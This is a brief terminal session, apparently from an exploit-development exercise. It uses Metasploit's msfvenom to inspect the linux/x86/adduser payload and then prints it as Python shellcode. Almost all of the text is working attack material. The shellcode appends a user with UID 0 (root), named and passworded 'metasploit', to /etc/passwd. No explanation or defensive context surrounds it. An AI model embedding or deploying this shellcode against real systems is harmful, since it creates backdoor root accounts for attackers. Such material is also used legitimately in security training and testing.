root# msfvenom --payload linux/x86/adduser --list-options
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
PASS   metasploit       yes       The password for this user
SHELL  /bin/sh          no        The shell for this user
USER   metasploit       yes       The username to create
Description:
  Create a new user with UID 0

root# msfvenom --payload linux/x86/adduser --format python | grep buf |\
> sed 's/buf /sc /g'
sc =  ""
sc += "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31"
sc += "\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68"
sc += "\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8"
sc += "\x28\x00\x00\x00\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69"
sc += "\x74\x3a\x41\x7a\x2f\x64\x49\x73\x6a\x34\x70\x34\x49"
sc += "\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69"
sc += "\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd"
sc += "\x80\x6a\x01\x58\xcd\x80"
